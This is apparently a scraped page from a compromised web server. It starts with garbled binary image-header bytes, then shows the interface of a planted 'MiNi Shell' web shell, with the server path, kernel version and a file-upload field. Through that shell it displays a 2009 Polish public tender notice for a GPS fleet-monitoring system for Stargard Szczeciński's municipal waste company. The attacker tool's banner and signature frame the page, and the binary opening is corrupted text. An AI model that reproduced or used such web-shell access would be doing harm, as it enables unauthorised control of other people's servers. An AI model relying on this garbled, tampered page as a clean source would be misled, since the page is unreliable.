JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090121/24165-N-2009.html

<p class="kh_header"><b>Stargard Szczeciński: Dostawa i wdrożenie kompletnego systemu lokalizacji i monitorowania pojazdów  i urządzeń wspomagający zarządzanie flotą w Zakładzie Oczyszczania Miasta.</b><br>
<b>Numer ogłoszenia: 24165 - 2009; data zamieszczenia: 21.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. , ul. Okrzei 6, 73-110 Stargard Szczeciński, woj. zachodniopomorskie, tel. 091 5771274, faks 091 5772128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpgk.stargard.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i wdrożenie kompletnego systemu lokalizacji i monitorowania pojazdów  i urządzeń wspomagający zarządzanie flotą w Zakładzie Oczyszczania Miasta..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i wdrożenie kompletnego systemu lokalizacji i  monitorowa- nia pojazdów  i urządzeń wspomagający zarządzanie flotą w Zakładzie Oczyszczania Miasta.
Zamówienie obejmuje:

1. Opomiarowanie pojazdów  Zakładu Oczyszczania Miasta w zakresie dostawy i montażu urządzeń niezbędnych dla uzyskania założonej funkcjonalności zgodnie z załącznikiem nr 1 do SIWZ.
2. Instalacja systemu zarządzania pojazdami na czterech stanowiskach edycyjnych( profesjonalnego oprogramowania działającego na platformie systemu operacyjnego Windows XP i nowszych) składającego się z następujących zintegrowanych modułów:
a. rozliczeń,
b. raportowania,
c. dyspozytorsko -logistycznego,
d. analitycznego.
3. Wdrożenie systemu zarządzania pojazdami.
4. Zintegrowanie systemu zarządzania pojazdami z wdrażanym systemem informatycznym u Zamawiającego  w zakresie opisanym w module (TRANSPORT).
5. Bezkosztowy nadzór-serwis  nad systemem w okresie gwarancji -36m-cy.
6. Bezpłatna aktualizacja wdrożonej wersji systemu w  okresie gwarancji -36m-cy.
Funkcjonalność systemu
System lokalizacji i monitorowania pojazdów  i urządzeń wspomagający zarządzanie flotą w przedsiębiorstwie. 
Główne zadanie systemu to wspomaganie kompleksowego zarządzania Zakładem Oczyszczania Miasta tj. bazą środków transportu i urządzeń  , kierowców, operatorów, zleceń  oraz informacją na temat zdarzeń pochodzącą z urządzeń rejestrujących.
System ma służyć  wszechstronnej analizie i wizualizacji danych pozyskiwanych podczas pracy pojazdów specjalistycznych. 
System ma być oparty na technologii GPS, umożliwiając pełny nadzór nad pojazdami i operatorami pojazdów  tj. aktualną kontrolę lokalizacji pojazdu, rozliczanie czasu jazdy i postojów, przebytych odległości, efektywności wykonania powierzonych zadań.
1. System winien pracować w trybach ofline i online.

2. System winien umożliwiać  wizualizację monitorowanych danych poprzez profesjonalną aplikację mapową (mapę cyfrową) oraz   automatyczną lokalizację i wizualizację na mapie cyfrowej poprzez przypisanie współrzędnych lokalizacyjnych , dowolnym danym adresowym  pobranym z innych aplikacji , baz danych lub arkuszy.  
Mapy powinny być aktualizowane nie rzadziej niż raz w roku.

3. System winien umożliwiać:

a) określanie lokalizacji (pozycji geograficznej) z maksymalnym błędem nie przekraczającym 5 m w otwartym terenie gdy na sygnał GPS nie działają zakłócenia, 
b) rejestrację przebytej trasy (pozycja, odległość, prędkość, czas), 
c) rejestrację włączeń i wyłączeń stacyjki i silnika pojazdu z informacją o czasie pracy,
d) rejestrację pracy(cykli, włączeń i wyłączeń) wybranych urządzeń hydraulicznych i mechanicznych pojazdu z informacją o czasie pracy,
e) rejestrację i analizę zużycia paliwa,
f) detekcję naruszeń stref chronionych  w pojeździe (np. systemu alarmowego, systemu opomiarowania paliwa itp. ),
g) pomiar i rejestracja napięcia zasilania w pojeździe, 
h) rejestrację i zdalną sygnalizację zaniku zasilania głównego, 
i) przekaz danych w czasie rzeczywistym, opóźnienie w wizualizacji przesyłanych danych nie większe niż 90 sekund przy założeniu działającej usługi GPRS w miejscu gdzie znajduje się pojazd.
4. System winien mieć możliwość  szybkiego  i elastycznego  dostępu do zasobów informacji gromadzonych przez urządzenia rejestrujące . W czasie rzeczywistym użytkownik winien mieć możliwość dostępu-podglądu(wizualizacji) do następujących danych:
a) bieżącej lokalizacji monitorowanego pojazdu, 
b) przebiegu tras w danym cyklu roboczym, 
c) stanu paliwa w określonym momencie czasu
d) aktualnego stanu pracy, 
e) czasu trwania poszczególnych zdarzeń, 
f) identyfikacji kierowców/operatorów prowadzących  pojazd,
g) meldunków wysyłanych przez kierowców/operatorów pojazdów ,
h) każdy zdefiniowany przez użytkownika punkt na mapie winien być identyfikowalny poprzez  dodatkowe odniesienie do określonej bazy danych, raportu-meldunku  charakteryzującego prezentowaną wizualizację.

5. System winien mieć możliwość  szybkiej  i elastycznej analizy i wizualizacji  informacji archiwalnych gromadzonych przez urządzenia rejestrujące w pojazdach i urządzeniach .

6. System winien pozwalać na wykorzystanie, tworzenie i planowanie :
a) (trasówek) dla zleceń cyklicznych
b) własnych map i planów sytuacyjnych zbudowanych na standardowych formatach zapisu.

7. System docelowo winien  elastycznie (współpracować) z wdrażanym przez Zamawiającego zintegrowanym systemem informatycznym w szczególności z modułem (TRANSPORT) i innymi    bazami  danych  :

a) pojazdów, 
b) kierowców ,
c) klientów, z podziałem na klientów indywidualnych oraz podmioty gospodarcze 
d) umów, 
e) lokalizacji obsługiwanych obiektów-kontrahentów ,
f) dowolnie definiowalnych zdarzeń.

8. System winien być źródłem danych dla następujących aplikacji wspomagających  zarządzanie:

a) bieżącą działalnością w zakresie świadczonych usług cyklicznych i jednorazowych ( wywozy wg harmonogramów i jednorazowe),
b) gospodarką transportową, ( konieczny  kontakt z dostawcą moduły (TRANSPORT) celem uzgodnienia technicznych warunków integracyjnych dotyczących niezbędnych technologii wymiany danych.
Niezbędne dane to:
- ilość przejechanych km w określonym przedziale czasu
- ilość przepracowanych mtg w określonym przedziale czasu
- ilość, miejsce, data i czas tankowań 
- ilość paliwa w zbiorniku na zadany moment
- ilości impulsów z czujników dodatkowych (podnośniki, załadunki, cykle) wraz z lokalizacją zdarzenia
- możliwość podłączenia dodatkowych odczytów wagowych z pojemników

c) gospodarką paliwowo-materiałową
d) ewidencją kadrowo-płacową.
Wymagania fukcjonalne  urządzeń 

Każdy z monitorowanych pojazdów winien posiadać:
1. Rejestrator 
a) rejestrator musi mieć możliwość odczytu przez nośnik danych kierowcy- praca offline.
b) rejestrator offline musi mieć możliwość podłączenia modemu GPRS wraz z kartą SIM do przesyłania danych- praca online.
c) rejestrator musi mieć możliwość rejestracji definiowanych przez zamawiającego (dla każdego pojazdu oddzielnie) komunikatów które wysyłają kierowcy (minimum 10 komunikatów)
d) funkcjonalność RCP w oprogramowaniu (rejestracja czasu pracy) poprzez identyfikację pracowników przychodzących i wychodzących z pracy (identyfikacja nośników danych w czytniku USB).

2. Osobisty identyfikator kierowcy będący nośnikiem danych. 
a) nośnik musi zawierać pełną kopię danych z rejestratora z możliwością  odczytu danych przez przystosowane do tego czytniki (poprzez USB - działające z komputerami z systemem Windows 95-98-2000-XP-Vista) 
b) nośnik wraz  oprogramowaniem winien umożliwiać rejestrację czasu pracy) poprzez identyfikację pracowników przychodzących i wychodzących z pracy (identyfikacja nośników danych w czytniku USB).

3. Możliwość pomiaru paliwa ze standardowego pływaka - opcjonalna sonda hydrostatyczna

Wymagania dodatkowe

Serwer z danymi oraz  cała infrastruktura i dane muszą znajdować się u Zamawiającego, żaden element systemu nie może znajdować się u dostawcy systemu, w szczególności serwer mapowy zainstalowany na serwerze zamawiającego.
System (online) musi działać z  dowolnym operatorem GSM.
System winien być wyposażony w szczegółowe plany miast i województwa zachodniopomorskiego oraz kompatybilne z ogólnodostępnymi aplikacjami mapowymi (plany- mapy kraju i Europy).
System po wdrożeniu nie może generować dodatkowych kosztów poza opłatami za transmisję danych - dla operatora GSM.
System winien być otwarty na możliwość zastosowania w okresie do 3 lat od wdrożenia terminali komunikacyjnych ( inkasenckich) dla kierowców monitorowanych pojazdów, umożliwiających bez ograniczeń:
a) komunikację z centrum dyspozytorskim , 
b) ewidencję i rozliczanie wykonanych zleceń i usług..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 32.53.00.00-7, 72.31.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy oraz inne warunki określone przez zamawiającego w siwz. 
2. Potwierdzeniem spełnienia warunków, o których mowa w ust. 1 będzie załączenie do oferty (o treści zgodnej z załącznikiem nr 1 do siwz) oświadczeń i dokumentów wymaganych w § 6 siwz..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert tj.
po 31 lipca 2008 roku.
2. Oświadczenie o spełnieniu przez wykonawcę warunków udziału w postępowaniu o udzielenie  zamówienia -  załącznik  nr  2,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mpgk.stargard.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Gospodarki Komunalnej Spółka z ograniczoną odpowiedzialnością,
73-110  Stargard Szczeciński, ul. Stefana Okrzei 6, pok. nr 1.-cena 50,00 złotych brutto..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2009 godzina 09:00, miejsce: Miejskie Przedsiębiorstwo Gospodarki Komunalnej Spółka z ograniczoną odpowiedzialnością,
73-110 Stargard Szczeciński, ul. Stefana Okrzei 6, pok. nr 15.-sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com